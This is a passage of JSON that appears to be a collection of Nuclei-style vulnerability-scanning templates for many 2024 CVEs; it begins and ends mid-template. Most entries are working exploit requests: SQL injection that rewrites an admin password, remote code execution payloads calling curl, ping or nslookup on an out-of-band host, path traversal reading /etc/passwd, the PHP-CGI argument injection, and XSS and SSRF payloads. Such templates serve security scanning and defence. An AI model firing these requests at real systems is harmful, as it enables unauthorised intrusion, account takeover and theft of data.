application/json\n\n{\"KeyStorePassword\": \"{{password}}\", \"TrustStorePassword\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(set_cookie, 'ASP.NET_SessionId=')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, 'application/json')"],"condition":"and","internal":true}]},{"raw":["GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'DisplayName')"],"condition":"and","internal":true}],"extractors":[{"type":"regex","internal":true,"name":"encryptedPassword","regex":["\"psyduck\\d+(,\\d+)*\""]}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'false')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/User/LoginAjax HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&rememberMe=false\n"],"matchers":[{"type":"word","part":"body","words":["\"authenticated\":true","\"username\":\""],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /gremlin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"SL7\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"ping\\\", \\\"{{interactsh-url}}\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"inputStream\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-0235","info":{"name":"EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"_user_role=administrator","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@","status\":\"good","value=","\"content\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41628","info":{"name":"Cluster Control CMON API - Directory Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"ClusterControl\",\"CMON_API\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../..//etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28397","info":{"name":"pyload-ng js2py - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npackage=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Could not decrypt key"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-34470","info":{"name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mailinspector/login.php"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["Licensed to HSC TREINAMENTO"]}]},{"method":"GET","path":["{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38288","info":{"name":"TurboMeeting - Post-Authentication Command Injection","severity":"high"},"requests":[{"raw":["POST /as/wapi/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnext_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login\n"],"matchers":[{"type":"word","part":"body","words":["as/wapi/profile_entry?sid="],"internal":true}],"extractors":[{"type":"regex","name":"sid","part":"body","group":1,"regex":["sid=(.*?)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /as/wapi/generate_csr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsid={{sid}}&common_name=1\"%20out%20/dev/null\"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CSR","SSL"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-32231","info":{"name":"Stash < 0.26.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /graphql HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json\n\n{\"operationName\":\"FindPerformers\",\"variables\":{\"filter\":{\"q\":\"\",\"page\":1,\"per_page\":40,\"sort\":\"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -\",\"direction\":\"ASC\"},\"performer_filter\":{}},\"query\":\"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\\n findPerformers(\\n filter: $filter\\n performer_filter: $performer_filter\\n performer_ids: $performer_ids\\n ) {\\n count\\n performers {\\n ...PerformerData\\n __typename\\n }\\n __typename\\n }\\n}\\n\\nfragment PerformerData on Performer {\\n id\\n name\\n disambiguation\\n url\\n gender\\n twitter\\n instagram\\n birthdate\\n ethnicity\\n country\\n eye_color\\n height_cm\\n measurements\\n fake_tits\\n penis_length\\n circumcised\\n career_length\\n tattoos\\n piercings\\n alias_list\\n favorite\\n ignore_auto_tag\\n image_path\\n scene_count\\n image_count\\n gallery_count\\n movie_count\\n performer_count\\n o_counter\\n tags {\\n ...SlimTagData\\n __typename\\n }\\n stash_ids {\\n stash_id\\n endpoint\\n __typename\\n }\\n rating100\\n details\\n death_date\\n hair_color\\n weight\\n __typename\\n}\\n\\nfragment SlimTagData on Tag {\\n id\\n name\\n aliases\\n image_path\\n parent_count\\n child_count\\n __typename\\n}\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["converting driver\\.Value type string \\(\\\\\"3.*?\\\\\"\\) to a int: invalid syntax"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33724","info":{"name":"SOPlanning 1.52.00 Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /process/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}\n","GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"attack":"pitchfork","payloads":{"username":["admin"],"password":["admin"]},"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"\", \"SOPlanning\")"],"condition":"and"}]}]},{"id":"CVE-2024-23163","info":{"name":"GestSup - Account Takeover","severity":"critical"},"requests":[{"raw":["POST /ajax/ticket_user_db.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: xmlhttprequest\nContent-Type: application/x-www-form-urlencoded\n\nmodifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success","firstname\":\"{{firstname}}\",\"lastname\":\"{{lastname}}"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}],"extractors":[{"type":"dsl","dsl":["\"Firstname: \"+ firstname","\"Lastname: \"+ lastname"]}]}]},{"id":"CVE-2024-23692","info":{"name":"Rejetto HTTP File Server - Template injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["rejetto"]}]}]},{"id":"CVE-2024-6746","info":{"name":"EasySpider 0.6.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["GET /taskGrid/tasklist.html HTTP/1.1\nHost: {{Hostname}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Task List\",\"Task ID\",\"Task Name\",\"URL\",\"\u4efb\u52a1\u5217\u8868 | Task List\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-8883","info":{"name":"Keycloak - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"redir_host":["http://localhost","http://127.0.0.1","https://localhost","https://127.0.0.1","http://[::]","https://[::]"],"client_id":["security-admin-console","master-realm","broker","admin-cli","account","account-console"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["Location:\\s+https?://(localhost|127.0.0.1|\\[::\\]):\\d*@oast\\.me\\?"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-5522","info":{"name":"WordPress HTML5 Video Player < 2.5.27 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36401","info":{"name":"GeoServer RCE in Evaluating Property Name Expressions","severity":"critical"},"requests":[{"raw":["GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"extractors":[{"type":"regex","name":"typename","part":"body","group":1,"regex":["typeName=([^&\\]]+)"],"internal":true}]},{"raw":["@timeout 20s\nGET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"content_type","words":["application/xml"]}]}]},{"id":"CVE-2024-39907","info":{"name":"1Panel SQL Injection - Authenticated","severity":"critical"},"requests":[{"raw":["POST /api/v1/auth/login HTTP/1.1\nHost: {{Hostname}}\nEntranceCode: ZW50cmFuY2U=\nContent-Type: application/json\n\n{\"name\":\"{{username}}\",\"password\":\"{{password}}\",\"ignoreCaptcha\":true,\"authMethod\":\"session\",\"language\":\"en\"}\n","POST /api/v1/hosts/command/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"page\":1,\"pageSize\":10,\"groupID\":0,\"orderBy\":\"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;\",\"order\":\"ascending\",\"name\":\"a\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"SQL logic error\",\"table exp already exists\")","contains(header_1, 'psession')"],"condition":"and"}]}]},{"id":"CVE-2024-21893","info":{"name":"Ivanti SAML - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /dana-ws/saml20.ws HTTP/1.1\nHost: {{Hostname}}\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tqwerty\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-23167","info":{"name":"GestSup - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /ajax/calendar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=add_event&title=&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1\n"],"matchers":[{"type":"word","part":"response","words":["{\"event_id\":\"","text/html"],"condition":"and","internal":true}]},{"raw":["POST /index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&pass={{password}}&submit=submit\n","GET /index.php?page=calendar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view=activity","?page=calendar",""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2024-4956","info":{"name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-40348","info":{"name":"Bazarr < 1.4.3 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login"],"matchers":[{"type":"word","part":"body","words":["Bazarr","content=\"Bazarr","window.Bazarr"],"condition":"or","internal":true}]},{"method":"GET","path":["{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39250","info":{"name":"EfroTech Timetrax v8.3 - Sql Injection","severity":"high"},"requests":[{"raw":["GET /Login.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"TimeTrax - Cloud HR Software\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /search.aspx?q=' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Incorrect syntax near\",\"Unclosed quotation mark after the character string\")","contains(content_type, \"text/html\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2024-38473","info":{"name":"Apache HTTP Server - ACL Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{files}}"],"payloads":{"files":["admin.php","adminer.php","xmlrpc.php",".env","admin.php","php-info.php","php_info.php","phpinfo.php","info.php","adminer.php","xmlrpc.php","bin/cron.php","cache/index.tpl.php","cpanel.php"]},"stop-at-first-match":true,"matchers":[{"type":"status","status":[403,401],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/{{http_1_files}}%3ftest.php"],"matchers":[{"type":"status","status":[200]}]},{"method":"GET","path":["{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"],"matchers":[{"type":"word","words":["On Debian systems, the complete text of the GNU General Public License","This package was written by Peter Tobias"],"condition":"and"}]}]},{"id":"CVE-2024-31750","info":{"name":"F-logic DataCube3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nreq_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq\")","contains(header, \"application/json\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-7954","info":{"name":"SPIP Porte Plume Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?action=porte_plume_previsu HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndata=AA_[->URL``]_BB\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["Composed-By: SPIP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29895","info":{"name":"Cacti cmd_realtime.php - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31848","info":{"name":"CData API Server < 23.4.8844 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData - API Server"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29059","info":{"name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","severity":"high"},"requests":[{"raw":["GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1\nHost: {{Hostname}}\n__RequestVerb: POST\nContent-Type: text/xml\n","POST {{objref}} HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml\n\n\n\n<ObjectDataProvider MethodName="AddHeader"\n xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"\n xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"\n xmlns:System="clr-namespace:System;assembly=mscorlib"\n xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance>\n <ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />\n </ObjectDataProvider.ObjectInstance>\n </ObjectDataProvider>\n </ObjectDataProvider.ObjectInstance>\n <ObjectDataProvider.MethodParameters>\n <System:String>X-Vuln-Test</System:String>\n <System:String>{{randstr}}</System:String>\n </ObjectDataProvider.MethodParameters>\n</ObjectDataProvider>\n\n\n"],"extractors":[{"type":"regex","name":"objref","part":"body_1","group":1,"regex":["(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"],"internal":true},{"type":"dsl","dsl":["x_vuln_test"]}],"matchers":[{"type":"dsl","dsl":["contains(body_1,'ObjRef')","contains(x_vuln_test,'{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2024-6587","info":{"name":"LiteLLM - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /chat/completions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"model\": \"command-nightly\",\n \"messages\": [\n {\n \"content\": \"Hello, how are you?\",\n \"role\": \"user\"\n }\n ],\n \"api_base\": \"https://{{interactsh-url}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["Bearer"]}]}]},{"id":"CVE-2024-41107","info":{"name":"Apache CloudStack - SAML Signature Exclusion","severity":"critical"},"requests":[{"raw":["POST /client/api?command=samlSso HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nRelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header,'sessionkey')","contains(content_type,'text/xml')","status_code==302"],"condition":"and"}]}]},{"id":"CVE-2024-21645","info":{"name":"pyload - Log Injection","severity":"medium"},"requests":[{"raw":["POST /login?next={{RootURL}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{randstr}}\\'%0a[1970-01-01 00:00:00] INJECTED {{str}} THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login\n","POST /login?next={{RootURL}}/logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{username}}&password={{password}}&submit=Login\n"],"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1970-01-01 00:00:00INJECTED{{str}}THIS ENTRY HAS BEEN INJECTED'"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4577","info":{"name":"PHP CGI - Argument Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"],"body":"\n","stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["3f2ba4ab3b260f4c2dc61a6fac7c3e8a"]}]}]},{"id":"CVE-2024-38816","info":{"name":"WebMvc.fn/WebFlux.fn - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/link/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31850","info":{"name":"CData Arc < 23.4.8839 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData Arc"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24565","info":{"name":"CrateDB Database - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"CREATE TABLE {{table_name}}(info_leak STRING)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"SELECT * FROM {{table_name}} limit 100\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_3)","contains_all(header, 'application/json')","status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-41667","info":{"name":"OpenAM<=15.0.3 FreeMarker - Template Injection","severity":"high"},"requests":[{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n"],"matchers":[{"type":"word","part":"body","words":["authId"],"internal":true}],"extractors":[{"type":"regex","name":"authId","part":"body","group":1,"regex":["\"authId\":\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n\n{\"authId\":\"{{authId}}\",\"template\":\"\",\"stage\":\"DataStore1\",\"header\":\"Sign in to OpenAM\",\"infoText\":[\"\",\"\"],\"callbacks\":[{\"type\":\"NameCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"User Name:\"}],\"input\":[{\"name\":\"IDToken1\",\"value\":\"{{username}}\"}]},{\"type\":\"PasswordCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"Password:\"}],\"input\":[{\"name\":\"IDToken2\",\"value\":\"{{password}}\"}]}]}\n"],"matchers":[{"type":"word","part":"body","words":["tokenId"]}],"extractors":[{"type":"kval","name":"csrf","part":"header","internal":true,"kval":["iPlanetDirectoryPro"]}]},{"raw":["GET /openam/realm/RMRealm?RMRealm.tblDataActionHref=/&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession1","part":"body","group":1,"regex":["jato.pageSession=(.*?)\""]}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tabCommon.TabHref=186&jato.pageSession={{pageSession1}}&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession2","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: 